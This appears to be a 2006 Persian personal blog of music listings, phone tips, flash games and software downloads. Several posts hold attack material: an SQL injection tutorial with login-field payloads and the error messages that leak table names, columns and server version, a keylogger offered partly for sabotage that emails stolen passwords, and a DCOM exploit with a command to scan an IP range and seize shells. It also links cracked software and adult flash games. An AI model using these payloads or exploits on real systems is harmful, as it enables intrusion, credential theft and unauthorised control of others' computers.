 4. خورشید خانوم
 5. صبحی آروم
 6. رقص با تنهایی
 7. تا چرا
 8. بمب باران
 9. هوای بهار
 10. INTERLUDE
 11. خیلی سخته
 12. نازنین
 13. نمیشه خاموش

پسورد آلبوم های بالا :     Password For Unzip : www.justmp3.tk

آلبوم جدید شهاب تیام به نام ( One )

 1. صد دفه گفتم
 2. دختر کابلی
 3. بی تو
 4. داری از چشمام میفتی
 5. رنگ عشق
 6. نیلوفر
 7. دیگه رفته
 8. صد دفه گفتم ۲


آلبوم جدید جهان به نام ( شهر عشق )

 1. شهر عشق
 2. خاتون
 3. لیلا
 4. بی تو ترانه
 5. لجباز
 6. دارا و سارا
 7. شازده خانم
 8. سفر
 9. مستی


موزیک ویدیو جدید آرش به نام ( آرش )

DOWNLOAD

 


چه فایده نظر نمی دین

+ نوشته شده در  شنبه بیست و دوم بهمن ۱۳۸۴ساعت 16:12  توسط رضا | 
 

 برنامه ای بسیار قوی برای دیدن فیلم های avi بر روی موبایل

برای دانلود به ادامه متن بروید



دانلود(download)

+ نوشته شده در  جمعه بیست و یکم بهمن ۱۳۸۴ساعت 11:2  توسط رضا | 
Hack

سلام به تمام دوستان خوبم در سایت لینک کده

امروز نرم افزاری را می خواهم بزارم که پسورد Dial-up Connection تان را به شما نشان دهد

البته اینم ذکر کنم که توسط همین سایت یعنی سایت لینک کده فارسی شده است

اینم نمایی از محیط برنامه :

اینم لینک دانلود : کلیک کنید


+ نوشته شده در  جمعه بیست و یکم بهمن ۱۳۸۴ساعت 11:0  توسط رضا | 
عنوان: بوش و گاو !!!


!پاسخگویی به این موضوع بهمراه نقل قول  

+ نوشته شده در  جمعه بیست و یکم بهمن ۱۳۸۴ساعت 10:58  توسط رضا | 
ین نرم افزار برای تشخیص صدا هست که صدای شما رو می فهمه و می تونه به متن تبدیل کنه و حتی

تمامی کارهای سیستم رو براتون با صدا انجام میده(جالبه نه؟!)



Dragon NaturallySpeaking 8 Professional Solutions Dragon NaturallySpeaking 8 Professional is the most accurate speech recognition product Nuance has ever developed - delivering up to 99% accuracy! Dragon NaturallySpeaking 8 Professional is the ideal solution for busy corporate professionals or organizations looking to keep people with disabilities, such as carpal tunnel syndrome, on the job


1-دانلود از اینجا
http://www.megaupload.com/?d=372UCPDP

۲-دانلود از اینجا
http://www.megaupload.com/?d=36E654KH

۳-دانلود از اینجا
http://www.megaupload.com/?d=27M4AC2I

پسورد فایل زیپ : blitzem


پخش کننده انواع فايلهاي صوتي؛ بدون اشغال حافظه زياد و پائين آمدن سرعت کامپيوتر





دانلود :


 برای رد و بدل کردن اطلاعات گوشی تلفن همراه با رایانه به نرم افزار خوب و قدرتمندی که این ارتباط را برقرار کند نیاز است . معمولا همراه با کابل گوشی ها , نرم افزارهای مخصوص انتقال دیتا توسط آن کابل برای آن گوشی نیز قرار دارد , ولی این نرم افزارها شاید نتوانند تمامی نیاز های شما را به عنوان کاربر پاسخ دهند .

MobTime Cell Phone Manager 2006 نام نرم افزار قدرتمند و مفیدی در این رابطه است که قادر به مدیریت اطلاعات گوشی های همراه شما در رایانه می باشد . این نرم افزار با تمامی مارکها و مدل های رایج تلفن همراه سازگاری دارد . مدل ها مختلف تلفن همراه Nokia, Siemens, Ericsson, SonyEricsson, Motorola و Samsung و .... که برای هر کدام از آنها Plug-in مخصوص به خود را داراست و همچنین همیشه در حال اضافه کردن پلاگین های بیشتر برای پشتیبانی مارکها و مدل های متعددتریست .

MobTime Cell Phone Manager چه کارهایی انجام می دهد ؟

Short Message Management : مدیریت تمامی SMS ها از لحاظ ویرایش , نوشتن , فرستادن و وارد کردن تمامی آنها به رایانه , پرینت کردن آنها , تکه تکه کردن خودکار SMS های بلند , گزارش وضعیت و نمایش آیکون های رایج مرود استفاده در محیط چت و ....

Phonebook and Contacts Management : مدیریت , گرفتن Backup , باز گرداندن آن به گوشی , ویرایش , اضافه نمودن , پاک کردن و پرینت کردن دفترچه تلفن شما .

Logo and Picture Management : مدیریت تصاویر تلفن همراه و انتقال تصاویر از گوشی به PC و از PC به گوشی .

Ringtones Management : مدیریت آهنگ های گوشی , انتقال آهنگ های مختلف از کامپیوتر به گوشی های مختلف تلفن همراه .

Files Management : تدبیل تلفن همراه و Memory آن به یک حاظفه ی USB که به آسانی قادر به انتقال فایلها از کامپیوتر به گوشی و از گوشی به کامپیوتر می باشید .

Picture Editor: بخش ویراستار تصویر که به شما امکان ویرایش تصاویری که توسط گوشی تان گرفته شده است و یا در سیستم قرار دارد و می خواهید به گوشی وارد نمایید را می دهد .

Dial-up Wizard : تبدیل تلفن همراه شما به مودم و امکان اتصال به اینترنت از کامپیوتر و با استفاده از تلفن همراه ! ( در صورت وجود سرویس های اینتنتی در شبکه ! )

راههای ارتباطی نرم افزار MobTime Cell Phone Manager :

این نرم افزار از طریق کابل اتصال مخصوص گوشی به رایانه ( RS232 یا USB) , از طریق درگاه مادون قرمز ( IrDA ) و به وسیله ی تکنولوژی Bloutooth قادر به برقراری ارتباط و انجام کارهای مدیریتی با گوشی شماست .

را می توانید از اینجا :

دانلود کنید نسخه ی 6.0.5 را با حجم 12.1 مگابایت
http://www.mobtime.com/en/cpm/cpm_en_v6.0.5.exe

لینکهای lکرک برای این نسخه از نرم افزار ( 6.0.5 ) :
http://www18.enfull.com/MobTime.Cell.Phone.Manager.2006.v6.05.WinALL.Cracked-UnderPl.zip
یا
http://rapidshare.de/files/11850973/un-ph65b-2006-01-26.rar.html

لینک نسخه ی کامل نرم افزار :
http://rapidshare.de/files/12192467/mobtime2006_Pro-Warez.ru.rar.html
پسورد : PRO-Warez


 روشن كردن نور صفحه نمايش وقتي صفحه کليد قفل است


درحالتي که صفحه کليد قفل است ، بدون اينکه لازم باشد قفل صفحه کليد را باز کنيد ، با فشردن کليد on/off مي توانيد لامپ صفحه نمايش را روشن کنيد تا مثلا ساعت را ببينيد يا وضعيت باتري گوشي را چک کنيد.



مشترک مورد نظر در دست رس نمی باشد !

براي در دسترس نبودن از فويل آلومينيوم استفاده كنيد و اون رو دور گوشي بپيچيد، يعني گوشي رو با اون بسته‌بندي كنيد.



برنامه هاي در حال اجرا در حافظه


کليد منو را فشار دهيد و در همان حال نگاه داريد تا صفحه سوييچ برنامه ها نمايش داده شود ، در اين صفحه ميتوانيد به برنامه هاي در حال اجراي ديگر سوييچ کنيد. چنانچه روي اسم هر برنامه اي در اين صفحه کليد C يا همان (Clear)را فشار دهيد ، برنامه خاتمه مي يابد. به اين طريق ميتوان سريعتر يک برنامه را پايان داد.


براي شناساندن هندزفزي (Hands Free ) به گوشي موبايل


استفاده از گزينه new paired device واقع در منوي conect



فرمت کارت حافظه گوشی


به صورت safe mode گوشی را روشن کنید ( برای اینکار درحالیکه دگمه pen (مداد) را نگه داشته اید گوشی را روشن کنید البته درظاهر تفاوتی را مشاهده نخواهید کرد.) سپس این مسیر را در گوشی بروید: menu>>Extras>>Memory>>Format MEM.card
حالت safe mode بسیار به دردتان خواهد شخورد و در مواقعیکه گوشی هنگ کرده و بالا نمی آید احتمالا به دادتان خواهد رسید و باعث می شود گوشی بالا بیاید و بعد از آن بتوانید گوشی را درصورت تمایلتان فورمت و یا کار دیگری بر روی آن بکنید. درواقع کار آن همانند عمل safe mode ویندوز می باشد و در این حالت دیگر اکثر برنامه های کاربردی که در پشت صحنه همیشه در حال اجرا بودند ، دیگر اجرا نخواهند شد و به همین دلیل گوشی اصطلاحا به راحتی بالا می آید. که در گوشی های مختلف کمی متفاوت می باشد و در اسمارت فونها اکثرا باید کلید خاصی را ( کلید ABC و یا PEN ) را نگه داشته و سپس گوشی را روشن کنید.تاکید می کنم که در حالت safe mode شما تغییری در ظاهر منوی گوشی نخواهید دید و همه چیز در پشت صحنه اتفاق افتاده است و یا بهتر بگویم از اتفاق افتادن آنها ( برنامه ها ) جلوگیری کرده است.



توصیه ها برای شارژ گوشی موبایل



براي شارژ باطري بهتراست كه گوشي را خاموش كرده و بعد شارژ كنيم، شارژ گوشي در زماني بايد انجام شود كه گوشي آلارم مخصوص خالي شدن باطري را چند بار به صدا درآورد. براي شارژ باطري هيچ وقت از شارژر ماشين استفاده نكنيد و اگر مجبور به استفاده شديد گوشي را حتماً خاموش كنيد.



چند نکته ...



بهترين آنتي ويروس KasperSky مي‌باشد كه قابليت آپديت شدن و حذف ويروس را دارد آنتي ويروسها مصرف باطري را بالا مي‌برند.

در صورت استفاده از تصاوير متحرك در بكراند گوشي مصرف باطري فوق العاده بالا مي‌رود.

نصب و پاك كردن برنامه‌ها در موبايل هيچ ضرري براي گوشي ندارد و فقط در طولاني مدت باعث انباشته شدن فايلهاي كوچكي از هر برنامه در گوشي مي شود كه با مستر ريست كردن گوشي قابل حل مي‌باشد.

در 6600 نمي‌تونيد فايل mp3 رو براي زنگ گوشي انتخاب كنيد.
براي 6600 هدفون وجود ندارد.

هيچ برنامة راديو براي 6600 وجود ندارد. براي راديو گوشي بايد مجهز به تيونر سخت افزاري باشد و چون در گوشي‌ها اين قطعه سخت افزاري وجود ندارد پس نمي‌توان از برنامه‌اي براي راديو استفاده كرد.


 

+ نوشته شده در  جمعه بیست و یکم بهمن ۱۳۸۴ساعت 10:46  توسط رضا | 
سه تا آهنگ از هایده میگیرم همتون احتمالا با این آهنگ ؛وقتی میای؛خاطره ها دارید حالا به صورت فلش هم اون را ببینید که چی است در ضمن یادتون نره که نظر بدهید.

 وقتی میای

عاشق شوی

عروسک

[آهنگ های ايرانی]

اینم دو تا فلش آهنگ های ایرانی از:(۹۸۲کلیک)

مریم حیدر زاده.........دکلمه

سامان.........شمعدون


[اينم يه بازی سکسی]

خب عزیزان یه بازی سکسی براتون میزارم اما خیلی پیش نمیاد از این کار ها کنم چون زیاد خودم دوست ندارم اما وب ما برای همه است و خیلی ها از این فلش ها دوست دارند.راستی نظر یادتون نره به ازای هر ۱۰ نظر یه فلش خیلی خیلی قشنگ میزارم دیگه خودتون می دونید.

 بازی سکسی


 

ی

+ نوشته شده در  سه شنبه چهارم بهمن ۱۳۸۴ساعت 0:32  توسط رضا | 
 
اینجا پر از فلشهای سکسی هست برید و لذت ببرید.ـ(۱۵۴۲کلیک)

فلش

+ نوشته شده در  سه شنبه چهارم بهمن ۱۳۸۴ساعت 0:15  توسط رضا | 
3 یک بازی جالب و کم‌حجم فلش! (985 كليك)

 


 

 





 

+ نوشته شده در  دوشنبه سوم بهمن ۱۳۸۴ساعت 17:2  توسط رضا | 
شهیاد

موزیک ویدیو جدید از شهیاد با همراهی امراه بنامه < بی تو هرگز

شهیاد و امراه

+ نوشته شده در  دوشنبه سوم بهمن ۱۳۸۴ساعت 16:25  توسط رضا | 
 حرف اول بازی خود را بجویید.

بعد کدها را از انجا پیدا کنید!!!!......

 

 

9
8
7
6
5
4
3
2
1
0
J
I
H
G
F
E
D
C
B
A
T
S
R
Q
P
O
N
M
L
K
$
_
!
Z
Y
X
W
V
U
 
 
 
 

 

  10 بازي پربيننده

 
 
نام بازي
دفعات بازديد

 PC : Grand Theft Auto: Vice City

 3679

 PC : Prince of Persia 2

 2071

 PC : Need for Speed Underground 2

 2005

 PC : IGI 2: Covert Strike

 1312

 PC : Grand Theft Auto: Vice City

 1210

 PC : Need for Speed Underground

 1094

 PC : Mafia

 1027

 PC : Grand Theft Auto 3

 1022

 PC : Max Payne 2: The Fall of Max Payne

 992

 PC : Teenage Mutant Ninja Turtles

 718
 
 
 

+ نوشته شده در  دوشنبه سوم بهمن ۱۳۸۴ساعت 14:45  توسط رضا | 
آموزش گرفتن اطلاعات مهم مانند Column types , Table names و بعضی از اطلاعات دیگر ما با داشتن این اطلاعات کارهای زیادی را می توانیم انجام بدهیم
برای گرفتن این اطلاعات باید به Error های برگشتی توجه کنید که برای ما بسیار مهم هستند
گرفتنTable Names:
برای به دست آوردن Table Names باید مانند زیر عمل کنید:
Username: ' having 1=1—
Password: a
که به این صورت Error های زیر را به دست می آورید:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
's_table.username' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP
BY clause.

که به راحتی توانستید نام یک Column را به دست آورید که به این صورت (s_table.id) می بینید:
اسم table s_table=
اسم اولین Column Username=
برای گرفتن اسم ستون ها می توان از روش زیر عمل کرد:
Login: ' group by s_table.username having 1 =1—
Password= a
که این پیغام را خواهید دید:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
's_table.password' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP
BY clause.
و اسم ستون دوم را نیز پیدا کردیم:
s_table.password
و برای دیگر ستون های می توانیم این کارها را انجام دهیم:
Login: ' group by s_table.username,s_table.password having = --'
Password: a


[Microsoft][ODBC SQL Server Driver][SQL Server]Column
's_table.Active' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP
BY clause.
و اسم سوم ستون:
Login: ' group by s_table.username,s_table.password,s_table.Active having = --
Password: a
گرفتنColumn Types:
برای این کار از روش زیر استفاده کنید:
Login: ' union select sum(username) from s_table—
Password: a
با توجه به Error به نوع ستون های می توان پی برد:

non-numerical: The sum or average aggregate operation cannot take a varchar data type
as an argument.
numerical All queries in an SQL statement containing a UNION operator must have an equal
number of expressions in their target lists
گرفتنVersion Number of Server:
برای این کار باید مراحل زیر را انجام دهید:
Login: ' union select @@version, , , --
Password: a
Syntax error converting the nvarchar value 'Microsoft SQL
Server 2000-8.00.194 (Intel X ) Aug 6 2000 20:37:43
Copyright (c)1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build : 2195 Service Pack 4) ' to a
column of data type int.

.

+ نوشته شده در  یکشنبه دوم بهمن ۱۳۸۴ساعت 18:56  توسط رضا | 
 

اینم یه کیلاگر خیلی قوی که هم بدرد خرابکاری میخوره هم بدرد کارهای مناسب. با این برنامه میتوندی سیستمتون رو بطور کامل کنترل کنید. این موردش بدرد والدین میخوره که بتونند فرزندانشون رو کنترل کنند و بفهمند بچه هاشون با کامپیوتر چیکار میکنند. مورد دیگش هم نمیگم چون همه اونا که خرابکارند خودشون میدونند !! این برنامه میتونه تمامی اعمال صورت گرفته توسط ویندو زو تمامی رمز ها و ... رو ذخیره کنه و برای شما به ایمیلتون بفرسته.

           دانلود  برنامه


کمک اين exploit که از باگ dcom استفاده مي کند  مي توانيد روي يک رنج ip بدون انجام هيچ کاري وارد سيستم قرباني شويد .بدون داشتن هيچ اطلاعاتي از هک و ارتباط قبلي با قرباني .البته اين باگ ازباگ هاي قديميه ولي  هنوز کار مي کنه و چون  مي خواستم که شروعي باشه براي ارائه ي باگ هاي کامپايل شده ي جديد که بزودي تو سايت ارائه مي شه . براي کار با اين باگ بعد از دانلود در درايو c خودتون کپيش کنيد   و بعد به منوي استارت بريد و در run رفته cmd را تايپ کنيد .بعد از ورود به cmd و با داشتن ip خود به طور مثال ip من 217.218.190.55 هستش ميرم تو command prompt  مينويسم C:>kaht2.exe 217.218.190.1 217.218.190.254 که با اين کار برنامه اين رنج را براي پيدا کردن سيستم هاي نفوذ پذير چک مي کند و وارد آن ها مي شود و خط فرمان آن ها را در اختيار شما قرار مي دهد (از آن ها شل مي گيرد)
 
دانلود کنید                 .این یکی جدا از یکی بالا است و کارایی ان فرق فکوله.

به دستور اقا هامان گذاشتم.

+ نوشته شده در  یکشنبه دوم بهمن ۱۳۸۴ساعت 18:55  توسط رضا | 
شما دوستان خواهشمندیم که برای فرا گیری هر چه بهتر اموزش کلیه مطالب را با دقت مطالعه کنید!

برای هک کردن موبایل کسی باید گوشی اون رو یک بار به دستتون بگیرید و شماره تلفن خودتون رو به صورت زیر بگیرید.مثلا اگر شماره شما :: ۰۹۱۷۷۸۲۵۰۱۰ بود شما باید به صورت :

*۰۹۱۷۷۸۱۵۰۱۰ بگیرید یعنی جولوش یک ستاره بگذارید.و وقتی شما ره گرفته شد  کافیه گوشیتونو بردارید تا ارتباط برقرار شود.خب حالا در واقع میتونیم بگیم که گوشی قربانی هک شد.و مرحله حساس این است که بدونیم چه جوری میشه بقیه کارو انجام داد.حالا ما در این حالت میتونیم ۳ تا کار رو آنجام بدبیم.در قسمت زیر به اون سه کار اشاره شده، د میزنم واین آموزش سه کاری است که در ادامه ترفند بالا بر روی گوشی قربانی قابل اجرا است:

۱:عدد ۲۳ رو شماره گیری کنید و بعد از شنیدن بوق آزاد شماره بگیرید و پول رو به حساب ..........۲:فقط کافیست

+ نوشته شده در  یکشنبه دوم بهمن ۱۳۸۴ساعت 11:4  توسط رضا | 
دوست عزیز هامان خیلی گشتم ولی اینترنت رایگان برای گرگان به دست نیاوردم.

دارم برات دنبال یک هکر خوب و مشت میگردم.

بهترین لینکها

 بهترین لینکهای روزانه

+ نوشته شده در  یکشنبه دوم بهمن ۱۳۸۴ساعت 10:50  توسط رضا | 
چندتا سایت موزیک هم معرفی کنید تا من دیدن کنم
+ نوشته شده در  یکشنبه دوم بهمن ۱۳۸۴ساعت 0:4  توسط رضا | 
متشکرم از شما که نظر دادی:سایت تو دیدم جالبه.

کسانی که نظر می دهید لطفااسم خود را بنویسید

متشکر.

+ نوشته شده در  یکشنبه دوم بهمن ۱۳۸۴ساعت 0:1  توسط رضا | 
یه فلش خیلی خنده دار که از وبلاگ یکی دزدیدم و گذاشتم اینجا که کونش بسوزه

http://www.littlepersia.se/funnyflash/peeping.swf

خیلی با مزست من حال کردم .

saeed_shaygan@yahoo.com

همیشه سرحال برای حال باشید

+ نوشته شده در  شنبه یکم بهمن ۱۳۸۴ساعت 21:26  توسط رضا |